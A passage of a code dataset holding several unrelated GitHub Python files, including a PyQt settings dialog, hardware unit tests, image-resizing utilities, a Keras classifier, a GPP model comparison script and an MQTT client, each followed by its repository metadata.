QMessageBox\r\nimport json\r\nimport os\r\n\r\n\r\nclass IB_setting(QDialog, Ui_ib_setting):\r\n def __init__(self):\r\n super().__init__()\r\n # use the Ui_login_form\r\n Logger().info('IB Setting Page Loading')\r\n self.file_path = 'ib_setting.json'\r\n self.ui = Ui_ib_setting()\r\n self.ui.setupUi(self)\r\n self.setup()\r\n\r\n def setup(self):\r\n self.ui.IB_SAVE.clicked.connect(self.save)\r\n self.reload()\r\n\r\n def reload(self):\r\n if os.path.exists(self.file_path):\r\n with open(self.file_path, 'r') as file:\r\n data = json.load(file)\r\n self.ui.IB_API_textedit.setText(data.get('api', ''))\r\n\r\n def save(self):\r\n try:\r\n self.text = self.ui.IB_API_textedit.text()\r\n data = {\r\n 'api': self.text\r\n }\r\n with open('ib_setting.json', 'w') as file:\r\n json.dump(data, file)\r\n Logger().info('Saved IB_Setting')\r\n QMessageBox.information(None, 'Save IB Setting', 'Saved Success')\r\n except Exception as 
e:\r\n Logger().error(f\"IB Setting Error : {e}\")\r\n QMessageBox.warning(None, 'System Error', str(e))\r\n","repo_name":"domainyman/Stock_backtest_py","sub_path":"Layout/SubLayout/IB/IB_setting.py","file_name":"IB_setting.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72554466009","text":"#===============================================================================\n# Bitwise Logical Operation Module Test\n#===============================================================================\n\nfrom pymtl3 import *\nfrom pymtl3.stdlib.test_utils import run_test_vector_sim\nfrom sim.bitwise_operation_unit import BitwiseOperationUnit\n\ndef test_and_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0x0, 0x0, 0x0),\n (0xffffffff, 0xffffffff, 0x0, 0xffffffff),\n (0x5, 0x2, 0x0, 0x0),\n (0x7, 0x3, 0x0, 0x3)\n ], cmdline_opts)\n\ndef test_or_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0x0, 0x1, 0xffffffff),\n (0x5, 0x2, 0x1, 0x7),\n (0x7, 0x3, 0x1, 0x7),\n (0x0, 0x0, 0x1, 0x0)\n ], cmdline_opts)\n\ndef test_xor_operation(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0xffffffff, 0xffffffff, 0x2, 0x0),\n (0x5, 0x2, 0x2, 0x7),\n (0x7, 0x3, 0x2, 0x4),\n (0x0, 0x0, 0x2, 0x0)\n ], cmdline_opts)\n\ndef test_edge_cases(cmdline_opts):\n logic_module = BitwiseOperationUnit()\n run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0x0, 0x0, 0x0, 0x0),\n (0x0, 0x0, 0x1, 0x0),\n (0x0, 0x0, 0x2, 0x0),\n (0xffffffff, 0x0, 0x0, 0x0),\n (0xffffffff, 0x0, 0x1, 0xffffffff),\n (0xffffffff, 0x0, 0x2, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x0, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x1, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x2, 0x0)\n ], cmdline_opts)\n","repo_name":"wrs225/Caravel-Vector-Coprocessor-AI","sub_path":"src/FunctionalUnits/sim/block_test/bitwise_operation_unit_test.py","file_name":"bitwise_operation_unit_test.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21721554390","text":"from copy import deepcopy\n\nimport cv2\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torchvision.transforms import InterpolationMode\n\nfrom vidar.utils.data import keys_with, align_corners\nfrom vidar.utils.decorators import iterate1\nfrom vidar.utils.types import is_seq\n\n\n@iterate1\ndef resize_pil(image, shape, interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes input image.\n\n Parameters\n ----------\n image : Image.PIL\n Input image\n shape : tuple [H,W]\n Output shape\n interpolation : int\n Interpolation mode\n\n Returns\n -------\n image : Image.PIL\n Resized image\n \"\"\"\n transform = transforms.Resize(shape, interpolation=interpolation)\n return transform(image)\n\n\n@iterate1\n@iterate1\ndef resize_npy(depth, shape, expand=True):\n \"\"\"\n Resizes depth map.\n\n Parameters\n ----------\n depth : np.array [h,w]\n Depth map\n shape : tuple (H,W)\n Output shape\n expand : bool\n Expand output to [H,W,1]\n\n Returns\n -------\n depth : np.array [H,W]\n Resized depth map\n \"\"\"\n # If a single number is provided, use 
resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Resize depth map\n depth = cv2.resize(depth, dsize=tuple(shape[::-1]), interpolation=cv2.INTER_NEAREST)\n # Return resized depth map\n return np.expand_dims(depth, axis=2) if expand else depth\n\n\n@iterate1\ndef resize_npy_preserve(depth, shape):\n \"\"\"\n Resizes depth map preserving all valid depth pixels\n Multiple downsampled points can be assigned to the same pixel.\n\n Parameters\n ----------\n depth : np.array [h,w]\n Depth map\n shape : tuple (H,W)\n Output shape\n\n Returns\n -------\n depth : np.array [H,W,1]\n Resized depth map\n \"\"\"\n # If a single number is provided, use resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Store dimensions and reshapes to single column\n depth = np.squeeze(depth)\n h, w = depth.shape\n x = depth.reshape(-1)\n # Create coordinate grid\n uv = np.mgrid[:h, :w].transpose(1, 2, 0).reshape(-1, 2)\n # Filters valid points\n idx = x > 0\n crd, val = uv[idx], x[idx]\n # Downsamples coordinates\n crd[:, 0] = (crd[:, 0] * (shape[0] / h)).astype(np.int32)\n crd[:, 1] = (crd[:, 1] * (shape[1] / w)).astype(np.int32)\n # Filters points inside image\n idx = (crd[:, 0] < shape[0]) & (crd[:, 1] < shape[1])\n crd, val = crd[idx], val[idx]\n # Creates downsampled depth image and assigns points\n depth = np.zeros(shape)\n depth[crd[:, 0], crd[:, 1]] = val\n # Return resized depth map\n return np.expand_dims(depth, axis=2)\n\n\n@iterate1\ndef resize_torch_preserve(depth, shape):\n if depth.dim() == 4:\n return torch.stack([resize_torch_preserve(depth[i], shape)\n for i in range(depth.shape[0])], 0)\n # If a single number is provided, use resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Store dimensions and reshapes to single column\n c, h, w = depth.shape\n # depth = np.squeeze(depth)\n # h, w = depth.shape\n x = depth.reshape(-1)\n # Create coordinate grid\n uv = np.mgrid[:h, :w].transpose(1, 2, 0).reshape(-1, 2)\n # Filters valid points\n idx = x > 0\n crd, val = uv[idx], x[idx]\n # Downsamples coordinates\n crd[:, 0] = (crd[:, 0] * (shape[0] / h)).astype(np.int32)\n crd[:, 1] = (crd[:, 1] * (shape[1] / w)).astype(np.int32)\n # Filters points inside image\n idx = (crd[:, 0] < shape[0]) & (crd[:, 1] < shape[1])\n crd, val = crd[idx], val[idx]\n # Creates downsampled depth image and assigns points\n depth = torch.zeros(shape, device=depth.device, dtype=depth.dtype)\n depth[crd[:, 0], crd[:, 1]] = val\n # Return resized depth map\n return depth.unsqueeze(0)\n\n\n@iterate1\n@iterate1\ndef resize_npy_multiply(data, shape):\n if data is None:\n return data\n ratio_w = shape[0] / data.shape[0]\n ratio_h = shape[1] / data.shape[1]\n out = resize_npy(data, shape, expand=False)\n out[..., 0] *= ratio_h\n out[..., 1] *= ratio_w\n return out\n\n\n@iterate1\ndef resize_intrinsics(intrinsics, original, resized):\n \"\"\"\n Resize camera intrinsics matrix to match a target resolution\n\n Parameters\n ----------\n intrinsics : np.array [3,3]\n Original intrinsics matrix\n original : tuple [W,H]\n Original image resolution\n resized : tuple [w,h]\n Target image resolution\n Returns\n -------\n intrinsics : np.array [3,3]\n Resized intrinsics matrix\n \"\"\"\n intrinsics = np.copy(intrinsics)\n\n ratio_w = resized[0] / original[0]\n ratio_h = resized[1] / original[1]\n\n intrinsics[0, 0] *= ratio_w\n intrinsics[1, 1] *= ratio_h\n\n # if align_corners():\n intrinsics[0, 2] = intrinsics[0, 2] * 
ratio_w\n intrinsics[1, 2] = intrinsics[1, 2] * ratio_h\n # else:\n # intrinsics[0, 2] = (intrinsics[0, 2] - 0.5) * ratio_w + 0.5\n # intrinsics[1, 2] = (intrinsics[1, 2] - 0.5) * ratio_h + 0.5\n\n return intrinsics\n\n\ndef resize_sample_input(sample, shape, shape_supervision=None,\n depth_downsample=1.0, preserve_depth=False,\n pil_interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes the input information of a sample (i.e. that go to the networks)\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n shape_supervision : tuple (H,W)\n Output supervision shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n pil_interpolation : int\n Interpolation mode\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Intrinsics\n for key in keys_with(sample, 'intrinsics', without='raw'):\n # if f'{key}_raw' not in sample.keys():\n # sample[f'{key}_raw'] = deepcopy(sample[key])\n sample[key] = resize_intrinsics(sample[key], list(sample['rgb'].values())[0].size, shape[::-1])\n # RGB\n for key in keys_with(sample, 'rgb', without='raw'):\n sample[key] = resize_pil(sample[key], shape, interpolation=pil_interpolation)\n # Mask\n for key in keys_with(sample, 'mask', without='raw'):\n sample[key] = resize_pil(sample[key], shape, interpolation=InterpolationMode.NEAREST)\n # Input depth\n for key in keys_with(sample, 'input_depth'):\n shape_depth = [int(s * depth_downsample) for s in shape]\n resize_npy_depth = resize_npy_preserve if preserve_depth else resize_npy\n sample[key] = resize_npy_depth(sample[key], shape_depth)\n return sample\n\n\ndef resize_sample_supervision(sample, shape, depth_downsample=1.0, preserve_depth=False):\n \"\"\"\n Resizes the output information of a sample (i.e. 
ground-truth supervision)\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Depth\n for key in keys_with(sample, 'depth', without='input_depth'):\n shape_depth = [int(s * depth_downsample) for s in shape]\n resize_npy_depth = resize_npy_preserve if preserve_depth else resize_npy\n sample[key] = resize_npy_depth(sample[key], shape_depth)\n # Normals\n for key in keys_with(sample, 'normals'):\n shape_normals = [int(s * depth_downsample) for s in shape]\n sample[key] = resize_npy(sample[key], shape_normals)\n # Semantic\n for key in keys_with(sample, 'semantic'):\n sample[key] = resize_npy(sample[key], shape, expand=False)\n # Optical flow\n for key in keys_with(sample, 'optical_flow'):\n sample[key] = resize_npy_multiply(sample[key], shape)\n # Scene flow\n for key in keys_with(sample, 'scene_flow'):\n sample[key] = resize_npy(sample[key], shape, expand=False)\n # Return resized sample\n return sample\n\n\ndef resize_sample(sample, shape, shape_supervision=None, depth_downsample=1.0, preserve_depth=False,\n pil_interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes a sample, including image, intrinsics and depth maps.\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n shape_supervision : tuple (H,W)\n Output shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n pil_interpolation : int\n Interpolation mode\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Resize input information\n sample = resize_sample_input(sample, shape,\n depth_downsample=depth_downsample,\n preserve_depth=preserve_depth,\n pil_interpolation=pil_interpolation)\n # Resize output information\n sample = resize_sample_supervision(sample, shape_supervision,\n depth_downsample=depth_downsample,\n preserve_depth=preserve_depth)\n # Return resized sample\n return sample\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/datasets/augmentations/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"72442667609","text":"import json\n\n\nclass NextObservationTaskAjaxModel(object):\n def __init__(self, case, glad_cluster, area, overlays):\n self.case = case.to_dict(exclude=['glad_cluster', 'creation_time'])\n self.case['case_id'] = case.key.id()\n self.glad_cluster = {\n \"cluster_id\": glad_cluster.key.id(),\n \"geojson\": glad_cluster.geojson\n }\n self.overlays = []\n for overlay in overlays:\n self.overlays.append(overlay.to_dict)\n self.area_id = area.key.id()\n\n def to_JSON(self):\n return json.dumps({\n \"case\": self.case,\n \"glad_cluster\": self.glad_cluster,\n \"area_id\": self.area_id,\n \"overlays\": self.overlays\n })\n\n\nclass BaseRouter(object):\n def _select_case_to_use_for_next_observation_task(self, user):\n pass\n\n def get_next_observation_task(self, user):\n return 
self._select_case_to_use_for_next_observation_task(user)\n","repo_name":"intotecho/bunjilforestwatch","sub_path":"bunjilforestwatch/observation_task_routers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"32247801459","text":"from multiprocessing import Pool\n\nimport os,time,random\n\ndef long_time_task(name):\n print('run task %s on (%s)'%(name,os.getpid()))\n start = time.time()\n time.sleep(random.random()*3)\n end = time.time()\n take_time = end - start\n print('Task %s cost %f second'%(name,take_time))\n\nif __name__ == '__main__':\n print('Parent process %s'%os.getpid())\n p = Pool(10) #选择自己想要的进程数\n for i in range(10):\n p.apply_async(long_time_task,args=(i,))\n print('wait for success')\n p.close()\n p.join()\n print('all ok')","repo_name":"yeyeyeyey/my_dev","sub_path":"django_learn/django_start/python_learn/day9进程&线程/进程池.py","file_name":"进程池.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1227767700","text":"import argparse\nfrom subprocess import call\nimport ROOT\nimport os, sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n#######\n#BELOW CODE IS OPTIMIZED FOR TENSORFLOW-2.4.1!\n#######\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout\nfrom tensorflow.keras.layers import Add, Lambda\nfrom tensorflow.keras.constraints import max_norm\n#from tf.keras.layers.noise import GaussianNoise\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras import initializers\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.losses import BinaryCrossentropy\nfrom tensorflow.keras.optimizers import Adadelta\nfrom tensorflow.keras.metrics import AUC\nfrom tensorflow.keras.utils import plot_model\nimport sys\nsys.path.append(os.environ[\"DIR_PATH\"])\nfrom root_data_loader import load_data, classWtoSampleW\n\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport tensorflow as tf\nimport optuna\nimport plotly\n\n\nprint('training using keras')\nvarlist_prekin = ['had_t_b_pt','w_u_pt','w_d_pt','lep_t_b_pt','had_t_b_bscore','lep_t_b_bscore',\n 'theta_w_u_w_d','theta_lep_neu','theta_lep_w_lep_t_b', 'del_phi_had_t_lep_t',\n 'had_t_mass','had_w_mass','lep_t_mass','lep_t_partial_mass']\nvarlist = varlist_prekin + ['chi2']\n\nclass mva_variable():\n def __init__(self, name, title, units, type=\"F\", isSpectator=False):\n self.name = name\n self.title = title\n self.units = units\n self.type = type\n self.isSpectator = isSpectator\n\n\nvarlist = [#mva_variable(\"n_jets\", \"n_jets\", \"#\", isSpectator=True),\n mva_variable(\"had_t_b_pt\", \"had_t_b_pt\", \"GeV\"),\n mva_variable(\"w_u_pt\", \"w_u_pt\", \"GeV\"),\n mva_variable(\"w_d_pt\", \"w_d_pt\", \"GeV\"),\n mva_variable(\"lep_t_b_pt\", \"lep_t_b_pt\", \"GeV\"),\n mva_variable(\"had_t_b_bscore\", \"had_t_b_bscore\", \"points\"),\n mva_variable(\"lep_t_b_bscore\", \"lep_t_b_bscore\", \"points\"),\n mva_variable(\"theta_w_u_w_d\", \"theta_w_u_w_d\", \"Rad.\"),\n mva_variable(\"theta_lep_neu\", \"theta_lep_neu\", \"Rad.\"),\n mva_variable(\"theta_lep_w_lep_t_b\", \"theta_lep_w_lep_t_b\", \"Rad.\"),\n mva_variable(\"del_phi_had_t_lep_t\", \"del_phi_had_t_lep_t\", \"Rad.\"),\n mva_variable(\"had_t_mass\", \"had_t_mass\", \"GeV\"),\n mva_variable(\"had_w_mass\", 
\"had_w_mass\", \"GeV\"),\n mva_variable(\"lep_t_mass\", \"lep_t_mass\", \"GeV\"),\n mva_variable(\"lep_t_partial_mass\", \"lep_t_partial_mass\", \"GeV\")\n ]\n\nvarlist_prekin = ['pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b','bvsc_had_t_b','bvsc_lep_t_b',\n 'theta_w_u_w_d','theta_lep_neu','theta_lep_w_lep_t_b', 'del_phi_had_t_lep_t',\n 'had_t_mass','had_w_mass','lep_t_mass','lep_t_partial_mass','pt_ratio']\nvarlist = varlist_prekin + ['chi2']\n\n\n\n# Define initialization\ndef normal(shape, name=None):\n return initializers.normal(shape, scale=0.05, name=name)\n\n# Generate model\nclass KerasModel():\n\n def __init__(self):\n self.model = Sequential()\n\n\n def defineModel_3layer(self,input_dim_,depth,neuron_exponent,maxnorm):\n K.clear_session()\n # Define model\n\n #\n # we can think of this chunk as the input layer\n self.model.add(Lambda(lambda X : X, input_shape=(input_dim_,))) #dummy Lamda layer for test\n for i in range(depth):\n self.model.add(Dense(pow(2,neuron_exponent+1), kernel_initializer=initializers.he_normal(seed=1232), kernel_constraint=max_norm(maxnorm)))\n self.model.add(BatchNormalization())\n self.model.add(Activation('elu'))\n self.model.add(Dropout(0.50))\n\n self.model.add(Dense(pow(2,neuron_exponent), kernel_initializer=initializers.he_normal(seed=1232), kernel_constraint=max_norm(maxnorm)))\n self.model.add(BatchNormalization())\n self.model.add(Activation('elu'))\n self.model.add(Dropout(0.50))\n\n\n # we can think of this chunk as the output layer\n self.model.add(Dense(1, kernel_initializer=initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=1234)))\n self.model.add(Activation('sigmoid'))\n\n #self.model.add(Dense(64, kernel_initializer=initializers.he_normal(seed=None), activation='relu', input_dim=input_dim_))\n #self.model.add(Dense(32, kernel_initializer=initializers.he_normal(seed=None), activation='relu'))\n #self.model.add(Dense(2, kernel_initializer=initializers.he_normal(seed=None), activation='softmax'))\n\n def compile(self,optimizer_,lossftn=BinaryCrossentropy(),\n #optimizer_=SGD(lr=0.1,decay=1e-5),\n # default lr=0.001\n #optimizer_=Adam(lr=0.1, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.1),\n #optimizer_=Nadam(lr=0.002, beta_1=0.9, beta_2=0.999, epsilon=None, schedule_decay=0.004),\n metrics_=['AUC'] ):\n # Set loss and optimizer\n self.model.compile(loss=lossftn, optimizer=optimizer_, metrics=metrics_)\n\n def save(self, modelName=\"model.h5\"):\n self.model.save(modelName)\n\n def summary(self):\n self.model.summary()\n\n def plot_mymodel(self,outFile='model.png'):\n print('plot model............')\n try:\n plot_model(self.model, to_file=outFile, show_shapes = False)\n except:\n print('[INFO] Failed to make model plot')\n \n\n\n\ndef objective_keras(trial: optuna.Trial, data):\n param = {\n 'depth':trial.suggest_int('depth',3,5),\n 'neuron_exponent':trial.suggest_int('neuron_exponent',3,5),\n #'rho':trial.suggest_uniform('rho',0.3,0.99),\n #'epsilon':trial.suggest_uniform('epsilon',1e-10,1e-7),\n 'batch_size':trial.suggest_categorical('batch_size',[pow(2,i) for i in range(9,15)]),\n 'max_norm':trial.suggest_float('max_norm',1,10)\n }\n modelDNN = KerasModel()\n modelDNN.defineModel_3layer(len(varlist_prekin) if chk_pre_kin else len(varlist),param['depth'],param['neuron_exponent'],param['max_norm'])\n optimizer=Adadelta(learning_rate=1.0, rho=0.95, epsilon=1e-7, clipnorm=0.1)\n #optimizer.build(modelDNN.model.trainable_variables)\n modelDNN.compile(optimizer_=optimizer)\n \n #optimizer_=Adadelta(learning_rate=1.0, rho=param['rho'], 
epsilon=param['epsilon'], decay=0.0, clipnorm=0.1)\n \n EPOCHS_SIZE = 1000\n BATCH_SIZE = param['batch_size']\n early_stopping = EarlyStopping(\n monitor='val_auc', \n verbose=1,\n patience=10,\n mode='max',\n restore_best_weights=True)\n modelDNN.model.fit(data['train_features'],data['train_y'],epochs=EPOCHS_SIZE,batch_size=BATCH_SIZE,callbacks=[early_stopping],validation_data=(data['val_features'],data['val_y']))\n modelDNN.plot_mymodel(outFile=f'model_trial_{trial.number}.png')\n test_result = modelDNN.model.evaluate(data['test_features'],data['test_y'],batch_size=1, verbose = 0)\n print(modelDNN.model.metrics_names)\n print(test_result)\n del modelDNN\n return test_result[1]\n \nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--n_jet', type=int)\n parser.add_argument('--pre_kin', type=int)\n args = parser.parse_args()\n n_jet = args.n_jet\n chk_pre_kin = True if args.pre_kin else False\n\n print(chk_pre_kin, n_jet)\n \n path_sample = os.environ[\"WtoCB_PATH\"]\n #filename = 'Vcb_Mu_TTLJ_WtoCB_powheg_25.root'\n filename = 'Vcb_Mu_TTLJ_WtoCB_powheg.root' \n data = load_data(os.path.join(path_sample,filename),n_jet,varlist_prekin if chk_pre_kin else varlist,0.2,0.2)\n # optuna.logging.set_verbosity(optuna.logging.DEBUG)\n # study = optuna.create_study(direction='maximize', sampler=optuna.samplers.TPESampler())\n # study.optimize(lambda trial: objective_keras(trial, data),n_trials=20)\n # fig_contour = optuna.visualization.plot_contour(study)\n # fig_importance = optuna.visualization.plot_param_importances(study)\n # fig_contour.write_html(f'opt_contour.html')\n # fig_importance.write_html(f'opt_importance.html')\n # print(f\"here is the result of hyperparameter tuning, best score = {study.best_value}:\\n\")\n # print(study.best_trial.params)\n # param = study.best_params\n param = {}\n param['depth'] = 3\n param['neuron_exponent'] = 3\n param['max_norm'] = 1\n param['batch_size'] = 2048\n modelDNN = KerasModel()\n modelDNN.defineModel_3layer(len(varlist_prekin) if chk_pre_kin else len(varlist),param['depth'],param['neuron_exponent'],param['max_norm'])\n optimizer=Adadelta(learning_rate=1.0, rho=0.95, epsilon=1e-7, clipnorm=0.1)\n #optimizer.build(modelDNN.model.trainable_variables)\n modelDNN.compile(optimizer_=optimizer)\n\n EPOCHS_SIZE = 1000\n BATCH_SIZE = param['batch_size']\n early_stopping = EarlyStopping(\n monitor='val_loss', \n verbose=1,\n patience=20,\n mode='auto',\n restore_best_weights=True)\n modelDNN.model.fit(data['train_features'],data['train_y'],epochs=EPOCHS_SIZE,batch_size=BATCH_SIZE,callbacks=[early_stopping],validation_data=(data['val_features'],data['val_y']))\n modelDNN.save()\n modelDNN.plot_mymodel(outFile='plot.png')\n \n \n\n","repo_name":"kyj519/VcbMVAStudy","sub_path":"keras/Permutation_MVA.py","file_name":"Permutation_MVA.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16899422638","text":"import numpy as np\nimport pandas as pd\nfrom scipy import io\nimport glob\nimport matplotlib.pylab as plt\nfrom matplotlib import rc\nfont = {'family': 'Times New Roman ',\n 'weight': 'bold',\n 'size': 28}\nrc('font', **font)\n\n# lc = io.loadmat(r'G:\\Research\\Gridded Data\\PDSI\\lc.mat')['lc']\nfiles = glob.glob(r'D:\\Research\\modelling\\model_development1\\RFR-LUE-GPP\\*.npy')\nfiles1 = glob.glob(r'D:\\Research\\modelling\\model_development1\\tower-LUE-GPP\\*.npy')\nfiles2 = 
glob.glob(r'D:\\Research\\modelling\\model_development1\\RandomForest_GPP\\*.npy')\n# data = np.load(files1[0])\n# plt.imshow(data)\n# plt.colorbar()\n# plt.show()\ndef AverageGpp(file):\n data = np.zeros([len(file), 360, 720], dtype=float)\n for i in range(0, len(file)):\n data[i, :, :] = np.load(file[i])\n gpp = np.sum(data, axis=0) / 6\n gpp = np.ma.masked_where(gpp == 0, gpp)\n return gpp\n\n''' get tower GPP data'''\ndef getGpp( year):\n year = str(year)\n df = pd.read_csv(\"D:\\Research\\modelling\\machine learning\\gpp.monthly.csv\")\n gppValue = {}\n totalSite = 0\n # for item in df.columns:\n # if np.isnan(df.ix[0, item]):\n # df.ix[0, item] = 0\n # df = df.interpolate(method='linear', axis=1)\n\n for item in df.columns[1:]:\n site, yr = item.split('.')\n if yr == year:\n dfSite = df[item].interpolate(method='linear')\n if np.any(dfSite.as_matrix() is np.nan):\n pass\n else:\n totalSite += 1\n gppValue[site] = np.mean(df[item].as_matrix());\n gpp=pd.DataFrame.from_dict(gppValue,orient='index')\n return gpp\n\ndef gridToPoint(lat, lon):\n if -90 <= lat <= 90:\n lat = 90 - lat\n lat_ind = int(lat // 0.5)\n\n if -180 <= lon <= 180:\n lon += 180\n lon_ind = int(lon // 0.5)\n return lat_ind, lon_ind\n\n#-------Main funtion starts here----------------------------------------------------------\n'''get the tower GPP from 2000-2005'''\ndf1 = getGpp(2000)\ndf2 = getGpp(2001)\ndf3 = getGpp(2002)\ndf4 = getGpp(2003)\ndf5 = getGpp(2004)\ndf6 = getGpp(2005)\n#\nresult = pd.concat([df1,df2,df3,df4,df5,df6],axis = 1, join ='outer')\n\n'''get the modeled GPP by from different RFR-LUE-GPP model, tower-LUE-GPP model and FRF-GPP model'''\nrfrLUEgpp = AverageGpp(files)*30/365.0\ntowerLUEgpp =AverageGpp(files1)/365.0\nrfrGpp = AverageGpp(files2)*6*30/365.0\n# plt.imshow(rfrGpp)\n# plt.colorbar()\n# plt.show()\n# #\ndf1 = pd.ExcelFile(r\"D:\\Research\\modelling\\machine learning\\fluxnet_2004-2005-monthly.xlsx\", header=0, index_col=0,\n parse_cols=0, has_index_name=True)\ndf1 = pd.ExcelFile.parse(df1, header=0)\nsiteName = df1.site_id\nsiteLat = {}\nsiteLon = {}\nsiteVeg = {}\nrfrLUE_DownGPP = {}\ntowerLUE_DownGPP = {}\nRFR_DownGPP = {}\nfor s in result.index:\n cnt = 0\n for site in siteName:\n if (s == site):\n latitude = df1.latitude.as_matrix()[cnt]\n siteLat[site] = latitude\n longitude = df1.longitude.as_matrix()[cnt]\n siteLon[site] = longitude\n siteVeg[site] = df1.igbp_veg_type.as_matrix()[cnt]\n indRow, indCol = gridToPoint(latitude,longitude)\n rfrLUE_DownGPP[site] = rfrLUEgpp[indRow,indCol]\n towerLUE_DownGPP[site] = towerLUEgpp[indRow,indCol]\n RFR_DownGPP[site] = rfrGpp[indRow,indCol]\n cnt += 1\nlat=pd.DataFrame.from_dict(siteLat,orient='index')\nlon = pd.DataFrame.from_dict(siteLon, orient='index')\nveg = pd.DataFrame.from_dict(siteVeg, orient='index')\nrfrLUEdf = pd.DataFrame.from_dict(rfrLUE_DownGPP,orient='index')\ntowerLUEdf = pd.DataFrame.from_dict(towerLUE_DownGPP,orient='index')\nRFRdf = pd.DataFrame.from_dict(RFR_DownGPP,orient='index')\nresult = pd.concat([veg,lat,lon,result,rfrLUEdf,towerLUEdf,RFRdf], axis = 1, join = 'inner')\nresult.to_excel('results.xlsx')\n","repo_name":"Suhua/Land-GPP-model-python","sub_path":"Final-project/modelObservationCompare.py","file_name":"modelObservationCompare.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17174251876","text":"# -*- coding: utf-8 -*-\n# 以下代码在2019年2月28日 python3.6环境下运行通过\nimport paho.mqtt.client as mqtt\nimport 
\n\n# HOST = \"192.168.0.12\"\nHOST = \"localhost\"\nPORT = 1883\nclient_id = \"1083421xxxxx\"  # leave it out if you do not have one; parts of the content are replaced with xxx here, same below\n\n\n# connect to the MQTT broker\ndef on_connect(client, userdata, flags, rc):\n    print(\"Connected with result code \"+str(rc))\n    client.subscribe(\"data/receive\")  # subscribe to the topic\n\n# message handler\ndef on_message(client, userdata, msg):\n    print(\"topic: \"+msg.topic+\" message: \"+str(msg.payload.decode('utf-8')))\n\n# subscription acknowledgement callback\ndef on_subscribe(client, userdata, mid, granted_qos):\n    print(\"On Subscribed: qos = %d\" % granted_qos)\n\n# disconnect callback\ndef on_disconnect(client, userdata, rc):\n    if rc != 0:\n        print(\"Unexpected disconnection %s\" % rc)\n\ndata = {\n    \"type\":2,\n    \"timestamp\": time.time(),\n    \"messageId\":\"9fcda359-89f5-4933-xxxx\",\n    \"command\":\"xx/recommend\",\n    \"data\":{\n        \"openId\":\"xxxx\",\n        \"appId\":'xxxx',\n        \"recommendType\":\"temRecommend\"\n    }\n}\nparam = json.dumps(data)\nclient = mqtt.Client(client_id)\nclient.username_pw_set(\"xxxxxx\", \"xxxxxx\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_subscribe = on_subscribe\nclient.on_disconnect = on_disconnect\nclient.connect(HOST, PORT, 60)\nclient.publish(\"data/send\", payload=param, qos=0)  # send the message\nclient.loop_forever()\n\n","repo_name":"Xiaochaosui/python_learning","sub_path":"tools/mqtt使用.py","file_name":"mqtt使用.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"27030118660","text":"# function\ndef output(n, m, edges, array):\n\tcheck = n//2\n\tedge_y = dict()\n\t\n\tfor i in range(m):\n\t\tkey = edges[i][1]\n\t\tif key in edge_y:\n\t\t\tedge_y[key].append(edges[i][0])\n\t\telse : \n\t\t\tedge_y[key] = 